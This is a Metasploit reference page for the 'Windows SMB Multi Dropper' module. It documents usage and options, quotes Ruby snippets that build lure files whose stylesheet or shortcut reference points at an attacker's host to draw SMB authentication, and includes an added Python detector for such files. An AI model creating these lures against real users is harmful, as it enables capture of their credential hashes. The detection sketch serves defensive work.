Windows SMB Multi Dropper - Metasploit
This page contains detailed information about how to use the auxiliary/fileformat/multidrop Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows SMB Multi Dropper
Module: auxiliary/fileformat/multidrop
Source code: modules/auxiliary/fileformat/multidrop.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
Depending on the given filename extension, this module creates a .lnk, .scf, .url, .xml, or desktop.ini file that includes a reference to the specified remote host, causing SMB connections to be initiated from any user that views the file.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect.
Basic Usage
msf > use auxiliary/fileformat/multidrop
msf auxiliary(multidrop) > show targets
... a list of targets ...
msf auxiliary(multidrop) > set TARGET target-id
msf auxiliary(multidrop) > show options
... show and set options ...
msf auxiliary(multidrop) > exploit
Required Options
- LHOST: Host listening for incoming SMB/WebDAV traffic
Msfconsole Usage
Here is how the fileformat/multidrop auxiliary module looks in the msfconsole:
msf6 > use auxiliary/fileformat/multidrop
msf6 auxiliary(fileformat/multidrop) > show info
Name: Windows SMB Multi Dropper
Module: auxiliary/fileformat/multidrop
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Richard Davy - secureyourit.co.uk
Lnk Creation Code by Mubix
asoto-r7
Check supported:
No
Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
FILENAME  word.lnk         yes       Filename - supports *.lnk, *.scf, *.url, *.xml, desktop.ini
LHOST                      yes       Host listening for incoming SMB/WebDAV traffic
Description:
This module dependent on the given filename extension creates either
a .lnk, .scf, .url, .xml, or desktop.ini file which includes a
reference to the the specified remote host, causing SMB connections
to be initiated from any user that views the file.
References:
https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018
https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/
https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/
Module Options
This is a complete list of options available in the fileformat/multidrop auxiliary module:
msf6 auxiliary(fileformat/multidrop) > show options
Module options (auxiliary/fileformat/multidrop):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
FILENAME  word.lnk         yes       Filename - supports *.lnk, *.scf, *.url, *.xml, desktop.ini
LHOST                      yes       Host listening for incoming SMB/WebDAV traffic
Advanced Options
Here is a complete list of advanced options supported by the fileformat/multidrop auxiliary module:
msf6 auxiliary(fileformat/multidrop) > show advanced
Module advanced options (auxiliary/fileformat/multidrop):
Name                   Current Setting  Required  Description
----                   ---------------  --------  -----------
DisablePayloadHandler  true             no        Disable the handler code for the selected payload
VERBOSE                false            no        Enable detailed status messages
WORKSPACE                               no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the fileformat/multidrop module can do:
msf6 auxiliary(fileformat/multidrop) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the fileformat/multidrop auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(fileformat/multidrop) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check the possible causes against the code snippets below, which are taken from the module source code. This can often help in identifying the root cause of the problem.
Invalid FILENAME option
Here is a relevant code snippet related to the "Invalid FILENAME option" error message:
  elsif datastore['FILENAME'].chars.last(3).join=="url"
    create_url
  elsif datastore['FILENAME'].chars.last(3).join=="xml"
    create_xml
  else
    fail_with(Failure::BadConfig,"Invalid FILENAME option")
  end
end

def createlnk
  #Code below taken from module droplnk.rb written by Mubix
FATAL ERROR: The document failed to render properly.
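Here is a relevant code snippet related to the "FATAL ERROR: The document failed to render properly." message. In this snippet the string is text written into the generated Word XML document, next to a stylesheet reference that points at LHOST, rather than a failure raised by the module: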
  xml=""
  xml << "<?xml version='1.0' encoding='utf-8' ?>"
  xml << "<?mso-application progid='Word.Document'?>"
  xml << "<?xml-stylesheet type='text/xsl' href='file://#{datastore['LHOST']}/share/word.xsl'?>"
  xml << "<Text>"
  xml << " FATAL ERROR: The document failed to render properly."
  xml << "</Text>"

  file_create(xml)
end
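For triage of received files, the sketch below flags files of the types this module generates when they reference a remote host through file:// or a UNC path, as the stylesheet href in the snippet above does. It is an added example, not part of the module or of the original page; the function names, the allowlist parameter and the sample host 192.0.2.10 are assumptions.

```python
import re

# File types listed in the module's FILENAME option (from the page).
LURE_NAMES = (".lnk", ".scf", ".url", ".xml", "desktop.ini")

# file://host/... with a non-empty host, and \\host\share UNC references.
FILE_URL = re.compile(r"file://([^/\\\s'\"<>]+)[/\\]", re.IGNORECASE)
UNC_PATH = re.compile(r"\\\\([^\\/\s'\"<>?*]+)\\[^\\\s'\"<>]+")

# Hosts that resolve to the local machine and never leave it.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "."}


def decode(raw: bytes) -> str:
    """Decode UTF-16 when a BOM is present; otherwise drop NUL bytes so
    BOM-less UTF-16LE strings (common in binary .lnk data) still match."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.replace(b"\x00", b"").decode("latin-1")


def remote_hosts(name: str, raw: bytes, allowed=frozenset()) -> list:
    """Return the remote hosts referenced by a file of a monitored type.

    `allowed` holds lower-case names of file servers that are expected
    (hypothetical allowlist; fill it from your own environment).
    """
    if not name.lower().endswith(LURE_NAMES):
        return []
    text = decode(raw)
    hosts = []
    for pattern in (FILE_URL, UNC_PATH):
        for match in pattern.finditer(text):
            host = match.group(1).lower()
            if host in LOCAL_HOSTS or host in allowed or host in hosts:
                continue
            hosts.append(host)
    return hosts


if __name__ == "__main__":
    # Constructed sample: the stylesheet line from the page with a
    # documentation-range address in place of LHOST.
    sample = b"<?xml-stylesheet type='text/xsl' href='file://192.0.2.10/share/word.xsl'?>"
    print(remote_hosts("report.xml", sample))
```

A hit on an external or unexpected host in one of these file types is a reason to check whether outbound SMB (TCP 445) and WebDAV from workstations are blocked at the perimeter.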
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #10589 Merged Pull Request: Added auxiliary/fileformat/multidrop support for Word XML documents
- #10157 Merged Pull Request: Multidrop Module Code Improvement
References
- CVE: Not available
- https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018
- https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/
- https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/
See Also
Check also the following modules related to this module:
- auxiliary/dos/ssl/dtls_changecipherspec
- auxiliary/scanner/ipmi/ipmi_cipher_zero
- post/windows/gather/enum_ad_service_principal_names
- auxiliary/fileformat/badpdf
- auxiliary/fileformat/odt_badodt
Authors
- Richard Davy - secureyourit.co.uk
- Lnk Creation Code by Mubix
- asoto-r7
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.